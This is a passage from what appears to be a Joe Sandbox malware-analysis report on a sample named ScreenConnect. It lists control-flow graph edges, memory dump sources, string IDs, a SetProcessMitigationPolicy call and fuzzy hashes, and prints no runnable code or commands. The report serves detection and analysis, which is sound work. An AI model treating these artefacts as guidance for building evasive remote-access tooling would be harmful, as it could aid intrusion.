                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 217 7ff849226a08-7ff849226a2a 221 7ff849226a31-7ff849226a3c 217->221 223 7ff849226a3d-7ff849226a48 221->223 223->221 225 7ff849226a4a-7ff849226a52 223->225 225->223 227 7ff849226a54-7ff849226ab8 225->227 233 7ff849226aba-7ff849226aca 227->233 235 7ff849226acb-7ff849226ad2 233->235 237 7ff849226ad4-7ff849226adc 235->237 237->233 239 7ff849226ade-7ff849226b29 237->239 245 7ff849226b2a-7ff849226b4c 239->245 248 7ff849226b4e-7ff849226bbc 245->248 255 7ff849226bbe-7ff849226bda 248->255 256 7ff849226c06-7ff849226c0c 248->256 257 7ff849226fe8-7ff849227006 call 7ff8492209c0 * 2 255->257 258 7ff849226be0-7ff849226bfe call 7ff8492209c0 * 2 255->258 259 7ff849226c13-7ff849226c16 256->259 273 7ff84922700c-7ff849227013 257->273 274 7ff849227112-7ff84922711d 257->274 275 7ff849226e7e-7ff849226e9c call 7ff8492209c0 * 2 258->275 276 7ff849226c04-7ff849226c05 258->276 262 7ff849226c18-7ff849226c1a 259->262 263 7ff849226c1c-7ff849226c2a 259->263 266 7ff849226c2d-7ff849226c42 262->266 263->266 277 7ff849226c48-7ff849226c6c call 7ff8492251e0 * 2 266->277 278 7ff849226c44-7ff849226c46 266->278 279 7ff849227015-7ff849227024 273->279 280 7ff849227026-7ff849227028 273->280 296 7ff849226e9e-7ff849226ea8 275->296 297 7ff849226ec6-7ff849226ed4 call 7ff8492209c0 275->297 276->256 283 7ff849226c6f-7ff849226c84 277->283 278->283 279->280 292 7ff84922702a 279->292 285 7ff84922702f-7ff849227053 280->285 298 7ff849226c8a-7ff849226cae call 7ff8492251e0 * 2 283->298 299 7ff849226c86-7ff849226c88 283->299 294 7ff84922709f-7ff8492270ad 285->294 295 7ff849227055-7ff849227072 285->295 292->285 294->274 308 7ff849227078-7ff84922709d 295->308 309 7ff84922711e-7ff849227197 295->309 302 7ff849226eaa-7ff849226eba 296->302 303 7ff849226ebc 296->303 316 7ff849226ed7-7ff849226ee4 call 7ff8492209c0 297->316 304 7ff849226cb1-7ff849226cc6 298->304 299->304 311 7ff849226ebe-7ff849226ebf 302->311 303->311 319 7ff849226cc8-7ff849226d01 304->319 320 7ff849226ccc-7ff849226cef call 7ff8492251e0 304->320 308->294 332 7ff849227199-7ff8492271dd 309->332 333 7ff8492271e0-7ff84922720f 309->333 311->297 328 7ff849226f9b-7ff849226fa6 316->328 329 7ff849226eea-7ff849226ef5 316->329 337 7ff849226d03-7ff849226d05 319->337 338 7ff849226d07-7ff849226d15 319->338 344 7ff849226fa8-7ff849226faa 328->344 345 7ff849226fac-7ff849226fbb 328->345 340 7ff849226efb-7ff849226f0a 329->340 341 7ff849226ef7-7ff849226ef9 329->341 332->333 343 7ff849226d18-7ff849226d21 337->343 338->343 347 7ff849226f0d-7ff849226f3b 340->347 341->347 364 7ff849226d28-7ff849226d2f 343->364 350 7ff849226fbe-7ff849226fc0 344->350 345->350 347->316 360 7ff849226f3d-7ff849226f41 347->360 350->274 356 7ff849226fc6-7ff849226fe7 350->356 360->328 363 7ff849226f43-7ff849226f48 360->363 366 7ff849226f4b-7ff849226f51 363->366 364->275 367 7ff849226d35-7ff849226d3c 364->367 369 7ff849226f53-7ff849226f5b 366->369 370 7ff849226f64-7ff849226f6c 366->370 367->275 371 7ff849226d42-7ff849226d59 367->371 372 7ff849226f6d-7ff849226f6e 369->372 373 7ff849226f5d-7ff849226f62 369->373 370->372 374 7ff849226f7e-7ff849226f99 370->374 377 7ff849226d5b-7ff849226d6d 371->377 378 7ff849226d8e-7ff849226d99 371->378 375 7ff849226f73-7ff849226f7d call 7ff849226898 372->375 373->375 374->328 374->366 375->374 385 7ff849226d6f-7ff849226d71 377->385 386 7ff849226d73-7ff849226d81 377->386 387 7ff849226d9b-7ff849226d9d 378->387 388 7ff849226d9f-7ff849226dae 378->388 389 7ff849226d84-7ff849226d87 385->389 386->389 390 7ff849226db1-7ff849226db3 387->390 388->390 389->378 391 7ff849226db9-7ff849226dd0 390->391 392 7ff849226e68-7ff849226e7d 390->392 391->392 398 7ff849226dd6-7ff849226df3 391->398 392->275 401 7ff849226dff 398->401 402 7ff849226df5-7ff849226dfd 398->402 403 7ff849226e01-7ff849226e03 401->403 402->403 403->392 405 7ff849226e05-7ff849226e0f 403->405 406 7ff849226e1d-7ff849226e25 405->406 407 7ff849226e11-7ff849226e1b call 7ff849221578 405->407 409 7ff849226e53-7ff849226e66 call 7ff8492251f0 406->409 410 7ff849226e27-7ff849226e4c call 7ff8492250d0 406->410 407->275 407->406 409->275 410->409
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: @`!I$@b!I
                                                                                                                                                                                                                                                    • API String ID: 0-3463773438
                                                                                                                                                                                                                                                    • Opcode ID: 38a5518e87f9f2f4f285c132b486d5a86eb853f9fd69fa6f082b7f61559cdcff
                                                                                                                                                                                                                                                    • Instruction ID: 70b13ddfb634e262fbabd1569c94a4874227ee7f4e6c880a70798936432fa0c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38a5518e87f9f2f4f285c132b486d5a86eb853f9fd69fa6f082b7f61559cdcff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6032F232E0DAA78FF7A9BB6894556B977E1EF94380F1440BAC07DC71D3DE29A9058340

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 527 7ff8492201d0-7ff8492201d9 528 7ff8492201db-7ff8492201dc 527->528 529 7ff8492201e3-7ff84922021e 527->529 528->529 533 7ff849220268-7ff849220290 529->533 534 7ff849220220-7ff849220267 529->534 538 7ff849220292-7ff8492202b1 533->538 539 7ff8492202b4-7ff8492202cc 533->539 534->533 538->539 544 7ff8492202ce-7ff8492202ed 539->544 545 7ff8492202f0-7ff8492202fe 539->545 544->545 549 7ff849220339-7ff849220344 545->549 550 7ff849220300-7ff84922030e 545->550 553 7ff84922035d-7ff849220368 549->553 554 7ff849220346-7ff849220353 549->554 551 7ff84922032a 550->551 552 7ff849220310-7ff849220328 550->552 559 7ff84922032f-7ff849220335 551->559 552->551 557 7ff84922036a-7ff849220387 553->557 558 7ff8492203b4-7ff8492203c8 553->558 554->553 561 7ff849220355-7ff84922035b 554->561 563 7ff84922038d-7ff8492203b2 557->563 564 7ff849220672-7ff8492206b5 557->564 566 7ff8492203ce-7ff8492203d1 558->566 567 7ff84922064d-7ff84922066f 558->567 559->549 559->566 561->553 563->558 581 7ff8492206d5-7ff8492206da 564->581 582 7ff8492206b7-7ff8492206cf 564->582 569 7ff849220428-7ff849220436 566->569 570 7ff8492203d3-7ff8492203dd 566->570 567->564 580 7ff849220440-7ff849220446 569->580 577 7ff8492203e5-7ff8492203fe 570->577 586 7ff84922046f-7ff84922047a 577->586 587 7ff849220400-7ff849220402 577->587 584 7ff84922044a-7ff849220456 580->584 585 7ff849220590-7ff8492205ae 580->585 599 7ff8492206db-7ff8492206e2 582->599 600 7ff8492206d1-7ff8492206d4 582->600 589 7ff849220458-7ff84922045a 584->589 590 7ff84922045c-7ff84922046a 584->590 585->567 614 7ff8492205b4-7ff8492205be 585->614 588 7ff84922047b-7ff84922047c 586->588 592 7ff84922047e-7ff84922048a 587->592 593 7ff849220404 587->593 588->592 598 7ff84922046d-7ff84922046e 589->598 590->598 595 7ff84922048c-7ff84922048e 592->595 596 7ff849220490-7ff849220491 592->596 593->584 594 7ff849220406-7ff84922040a 593->594 594->588 601 7ff84922040c-7ff849220411 594->601 604 7ff8492204a1-7ff8492204a5 595->604 605 7ff849220492-7ff84922049e 596->605 598->586 602 7ff8492206ee-7ff84922073b 599->602 603 7ff8492206e4-7ff8492206ed 599->603 600->581 601->605 607 7ff849220413-7ff84922041e 601->607 609 7ff8492204a6-7ff8492204be 604->609 605->604 611 7ff84922048f 607->611 612 7ff849220420-7ff849220425 607->612 622 7ff8492204c0-7ff8492204c2 609->622 623 7ff8492204c4-7ff8492204d2 609->623 611->596 612->609 615 7ff849220427 612->615 618 7ff8492205c0-7ff8492205c2 614->618 619 7ff8492205c4-7ff8492205d2 614->619 615->569 620 7ff8492205d5-7ff8492205f2 618->620 619->620 631 7ff8492205f8-7ff849220606 620->631 632 7ff8492205f4-7ff8492205f6 620->632 626 7ff8492204d5-7ff8492204f2 622->626 623->626 633 7ff8492204f8-7ff849220506 626->633 634 7ff8492204f4-7ff8492204f6 626->634 635 7ff849220609-7ff849220626 631->635 632->635 636 7ff849220509-7ff84922051f 633->636 634->636 641 7ff849220628-7ff84922062a 635->641 642 7ff84922062c-7ff84922063a 635->642 643 7ff849220521-7ff849220534 636->643 644 7ff849220536-7ff84922053d 636->644 645 7ff84922063d-7ff849220646 641->645 642->645 643->644 649 7ff84922055d-7ff849220560 643->649 647 7ff849220544-7ff849220557 644->647 645->567 647->649 650 7ff849220562-7ff849220575 649->650 651 7ff849220577-7ff84922058a 649->651 650->585 650->651 651->585
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x!!I
                                                                                                                                                                                                                                                    • API String ID: 0-903845743
                                                                                                                                                                                                                                                    • Opcode ID: fbef30b56ee4beb74f46a7e562059b1f6b063351fe111bb563fd0fd5fedff192
                                                                                                                                                                                                                                                    • Instruction ID: 52d6bddbbbca82820e98d1ca613daa6c4d452847d0e6c77b09d24453063db284
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbef30b56ee4beb74f46a7e562059b1f6b063351fe111bb563fd0fd5fedff192
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87121131A4DA9A8FF7A8FB2C94556B537D1FFA8380F1440BAD46DC72D6DD28AC468340
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d25a0b1df98609af60d986cad8b533295182b1fe9bdc3762aa6b3458e301a8de
                                                                                                                                                                                                                                                    • Instruction ID: a9bd9277ff5c0246222413f58c014f9b30e3bb31786267a4c1a25d0637ee0ba1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d25a0b1df98609af60d986cad8b533295182b1fe9bdc3762aa6b3458e301a8de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DE1D333E0DEA78EF779BF6884556B96792EF94781F14407AC03EC71C2DE29AA058740

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: PH$XH$`H$X!I$Z!I${2
                                                                                                                                                                                                                                                    • API String ID: 0-1852867366
                                                                                                                                                                                                                                                    • Opcode ID: 4d084d04198e9ea2e2272a4772d6ee0a7ddf03d4a3fb5bf7c021c0720535b207
                                                                                                                                                                                                                                                    • Instruction ID: 9c7edbc04506bf90167d2922647ab57ec35b77fef45bd7bc22a057cf87bbb430
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d084d04198e9ea2e2272a4772d6ee0a7ddf03d4a3fb5bf7c021c0720535b207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82910871A0C99A4FEB98EF289851AB537E1FF64750F1405BDD06EC7287DE29F8068780

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3299529708.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 5aeba379722867c92646d88d95da6835f5ec7832318175c4ce25436a5b804fac
                                                                                                                                                                                                                                                    • Instruction ID: f25cf8dfcf14d8d09b741f9f312170a048f75e0169dcda7f12635c55ebdd2ae0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5aeba379722867c92646d88d95da6835f5ec7832318175c4ce25436a5b804fac
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75515831C1CB484FDB15AFA8984A5F9BBE0EF55750F04017EE489C3192DF68A846CB95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 870 7ff848f13aa2-7ff848f180ef 872 7ff848f180f6-7ff848f18150 SetProcessMitigationPolicy 870->872 873 7ff848f18158-7ff848f18187 872->873 874 7ff848f18152 872->874 874->873
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3299529708.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff848f10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                    • Opcode ID: 8d12d78ff30a10a4ae70b9015ec686206be755e5318f8b2bfec91809a2d54926
                                                                                                                                                                                                                                                    • Instruction ID: 4f5062ce2a2722717206b3177d7c54607bd648c9b0ebfa7aca18ea9323aef446
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d12d78ff30a10a4ae70b9015ec686206be755e5318f8b2bfec91809a2d54926
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121D73191CB188FDB18AF9CD84A6FAB7E0EB55711F00413EE04AD3651DB74B8458B95

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (O"I
                                                                                                                                                                                                                                                    • API String ID: 0-2545298724
                                                                                                                                                                                                                                                    • Opcode ID: 0a160fb43ba8c347614bcb8da3a555181ecc0073fb8d29cd277dbb9464657f57
                                                                                                                                                                                                                                                    • Instruction ID: f9eda17d878dc7ad20c1735640f91c2de6c3c93500e05b5f06dea00d805303e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a160fb43ba8c347614bcb8da3a555181ecc0073fb8d29cd277dbb9464657f57
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73A1F631E1D9965FF7A8BE2880516B533E1FFA4780F14457EC42EC32C7DE28A9458780

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1000 7ff849225b64-7ff849225b69 1001 7ff849225b6f-7ff849225b8e 1000->1001 1002 7ff849225c30-7ff849225c37 1000->1002 1010 7ff849225bda-7ff849225bee 1001->1010 1011 7ff849225b90-7ff849225bad 1001->1011 1003 7ff849225c3d-7ff849225c44 1002->1003 1004 7ff849225cc7-7ff849225cce 1002->1004 1003->1004 1008 7ff849225c46-7ff849225c54 1003->1008 1005 7ff849225cd9-7ff849225cec 1004->1005 1006 7ff849225cd0-7ff849225cd7 1004->1006 1023 7ff849225cfd-7ff849225d05 1005->1023 1024 7ff849225cee-7ff849225cf3 1005->1024 1006->1005 1009 7ff849225d16-7ff849225d1d 1006->1009 1008->1009 1035 7ff849225c5a-7ff849225ca1 1008->1035 1013 7ff849225f81-7ff849225f88 1009->1013 1014 7ff849225d23-7ff849225d2a 1009->1014 1021 7ff849225c20-7ff849225c21 1010->1021 1022 7ff849225bf0-7ff849225bfa 1010->1022 1025 7ff849225bb3-7ff849225bd8 1011->1025 1026 7ff849226744-7ff84922674c 1011->1026 1019 7ff84922671e-7ff849226731 1013->1019 1020 7ff849225f8e-7ff849225f95 1013->1020 1014->1013 1018 7ff849225d30-7ff849225d33 1014->1018 1028 7ff849225d3c-7ff849225d4a 1018->1028 1029 7ff849225d35-7ff849225d37 1018->1029 1020->1019 1030 7ff849225f9b-7ff849225fad 1020->1030 1040 7ff849225c28-7ff849225c29 1021->1040 1031 7ff849225c08-7ff849225c12 1022->1031 1032 7ff849225bfc-7ff849225c06 call 7ff849225160 1022->1032 1033 7ff849225d0b-7ff849225d0f 1023->1033 1034 7ff849226771-7ff8492267a3 1023->1034 1024->1023 1025->1010 1052 7ff84922674d-7ff84922675e 1026->1052 1056 7ff849225d4c 1028->1056 1057 7ff849225d4e 1028->1057 1036 7ff849225dea-7ff849225ded 1029->1036 1037 7ff849225ff9-7ff84922600c 1030->1037 1038 7ff849225faf-7ff849225fba 1030->1038 1031->1040 1041 7ff849225c14-7ff849225c1e call 7ff849221578 1031->1041 1032->1021 1032->1031 1033->1009 1035->1008 1083 7ff849225ca3 1035->1083 1048 7ff849225def-7ff849225df1 1036->1048 1049 7ff849225df6-7ff849225e04 1036->1049 1062 7ff849226013-7ff84922601e 1037->1062 1038->1013 1058 7ff849225fbc-7ff849225fcc 1038->1058 1040->1002 1041->1021 1041->1040 1059 7ff849225ea5-7ff849225eab 1048->1059 1077 7ff849225e08 1049->1077 1078 7ff849225e06 1049->1078 1067 7ff84922675f-7ff849226770 1052->1067 1066 7ff849225d50-7ff849225d53 1056->1066 1057->1066 1058->1067 1068 7ff849225fd2-7ff849225ff7 1058->1068 1064 7ff849225f5d-7ff849225f5f 1059->1064 1065 7ff849225eb1-7ff849225eb3 1059->1065 1071 7ff8492260c1-7ff8492260c7 1062->1071 1072 7ff849226024-7ff84922603c 1062->1072 1064->1013 1079 7ff849225f61-7ff849225f69 1064->1079 1065->1064 1074 7ff849225eb9-7ff849225eed 1065->1074 1075 7ff849225d5d-7ff849225d68 1066->1075 1076 7ff849225d55-7ff849225d5b 1066->1076 1067->1034 1068->1037 1071->1019 1082 7ff8492260cd-7ff8492260d5 1071->1082 1072->1071 1104 7ff849226042-7ff849226043 1072->1104 1074->1064 1087 7ff849225d6a-7ff849225d87 1075->1087 1088 7ff849225db4-7ff849225dd5 1075->1088 1085 7ff849225dd8-7ff849225de8 1076->1085 1089 7ff849225e0a-7ff849225e0d 1077->1089 1078->1089 1079->1013 1080 7ff849225f6b-7ff849225f7d 1079->1080 1080->1013 1093 7ff84922611d-7ff849226125 1082->1093 1094 7ff8492260d7-7ff849226116 1082->1094 1085->1036 1087->1052 1107 7ff849225d8d-7ff849225db2 1087->1107 1088->1085 1099 7ff849225e0f-7ff849225e15 1089->1099 1100 7ff849225e17-7ff849225e22 1089->1100 1093->1019 1106 7ff84922612b-7ff849226178 1093->1106 1094->1093 1108 7ff849225e93-7ff849225ea3 1099->1108 1101 7ff849225e6e-7ff849225e90 1100->1101 1102 7ff849225e24-7ff849225e2f 1100->1102 1101->1108 1102->1101 1113 7ff849226046-7ff8492260ac 1104->1113 1129 7ff84922617a-7ff8492261a4 1106->1129 1107->1088 1108->1059 1135 7ff8492260b9-7ff8492260bf 1113->1135 1136 7ff8492260ae-7ff8492260b4 call 7ff849225170 1113->1136 1139 7ff8492261aa-7ff8492261b5 1129->1139 1140 7ff849226711-7ff849226718 1129->1140 1135->1071 1135->1113 1136->1135 1139->1129 1142 7ff8492261b7-7ff849226260 1139->1142 1140->1019 1140->1106 1142->1140
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: x!!I
                                                                                                                                                                                                                                                    • API String ID: 0-903845743
                                                                                                                                                                                                                                                    • Opcode ID: 0f437839b47f8ba1fc3b22e7d3d7d7aa3bc47c83a2fd7ba448caa69b1c787f3d
                                                                                                                                                                                                                                                    • Instruction ID: 25e85f5cdcf3c052216f446f0240900ff2bc5e26b2597890dc1ab08b17ff1187
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f437839b47f8ba1fc3b22e7d3d7d7aa3bc47c83a2fd7ba448caa69b1c787f3d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D791782191E5D74FF795BB7864515F93BA0EF41798F0842BAD0ACCB0C7EE1CA8068356
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: P!!I
                                                                                                                                                                                                                                                    • API String ID: 0-1348014270
                                                                                                                                                                                                                                                    • Opcode ID: 2b02ba1dc1053c5f7692232c69dbaa94cdf1c372865f064a1777b33d950ad4d7
                                                                                                                                                                                                                                                    • Instruction ID: 5ef563c6f016fbc4758b6b7c2fb94539a6d7d19c5e5d443b5e9dfc5d601a4fac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b02ba1dc1053c5f7692232c69dbaa94cdf1c372865f064a1777b33d950ad4d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E11E131E4DAD94FEBA4FB2884556B97BF0FF6A340F4400AAD11DC32D2CE29A8058341
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 89a5f76c989a7ae3eecb1141d09e8174f6b990a24d4a93dbcb85e574a0bb0ba4
                                                                                                                                                                                                                                                    • Instruction ID: 4720e8f2fb80fa25c92e3a6a124e672f3af1cca98424b5e254054cb9f5f29c15
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a5f76c989a7ae3eecb1141d09e8174f6b990a24d4a93dbcb85e574a0bb0ba4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5C1383290DE9A1FF769FF2894529B537E0EF60790B04067DD46E87187EE18B90A8781
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1a05702dace38334808a70656e1e52e590a9d8cbdb58b4de83ce326e9209bb8d
                                                                                                                                                                                                                                                    • Instruction ID: c843bced0b4021c162e0f9b252671d4509c6a20ef40a003a5f2eb2a5020f5de6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a05702dace38334808a70656e1e52e590a9d8cbdb58b4de83ce326e9209bb8d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88817532E1CA678EFBB5FF6490516B962D2FF94784F50443AD03EC71C2DE29B9028644
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2e76fa8902e7ad08dcd9b7dbbcb72678cc14c075dd5a9af435bbd64280c7ba7c
                                                                                                                                                                                                                                                    • Instruction ID: 94d79aaa4da23a98735e0d2071257688f9c56567c55e1f328f32fe4e13db467b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e76fa8902e7ad08dcd9b7dbbcb72678cc14c075dd5a9af435bbd64280c7ba7c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9961063464CA598FDBDDEF18C491AA573E2FF99344B2445A9C02DCB68BCA25EC47C740
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 57abb39cf0779e41eece551f53cc10eb42275cc0fe5f9088527da059ca9668c7
                                                                                                                                                                                                                                                    • Instruction ID: e2bde3986cd7fcb944965b9d90cad290706a50dcc2d7fb04bf41816368b383db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57abb39cf0779e41eece551f53cc10eb42275cc0fe5f9088527da059ca9668c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F41E827D0D6E25FE316AF7868658E5BF60EF1325970901F7D0A8D7093E909680AC761
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.3304323030.00007FF849220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ff849220000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
